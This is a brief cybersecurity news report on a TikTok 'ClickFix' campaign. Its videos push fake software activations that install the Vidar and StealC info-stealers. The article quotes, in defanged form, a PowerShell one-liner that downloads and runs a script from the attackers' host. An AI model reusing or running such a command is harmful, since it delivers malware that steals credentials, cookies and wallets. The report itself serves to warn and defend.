Cybersecurity publishers like Bleeping Computer are raising alarms as a growing campaign uses short-form videos on TikTok to deliver information-stealer malware under the guise of free software activations. Under this scheme, threat actors publish clips promising “free Windows or Spotify unlocks” and instruct users to run simple PowerShell commands, a tactic known as a “ClickFix” attack.

Once executed, the script downloads payloads such as Vidar or StealC that harvest credentials, cookies, crypto wallet data and send it back to attackers.The videos often appear benign, but deliver malicious code by showing users how to paste a command like iex (irm slmgr[.]win/activate) into PowerShell.

Experts note the use of AI-generated content and rapid creation of fake profiles to push these scams at scale through TikTok’s algorithmic reach. One video reached nearly half a million views.

Organizations and individual users alike are urged to treat any unsolicited “software activation” or “premium unlock” video with caution. Running unknown commands, particularly those invoked via PowerShell or terminal windows, remains a high-risk behaviour.

Cyber-defence teams recommend enforcing “no direct execution of social-media provided commands,” and increasing detection of hidden persistence mechanisms created by such payloads.

Though social engineering itself is nothing new, the merging of platform-native video content, AI generation, and “paste-and-run” scripts signals a shift in how malware is being delivered. As this threat evolves, defenders should assume that any content promising “quick fix” solutions is hostile until proven otherwise.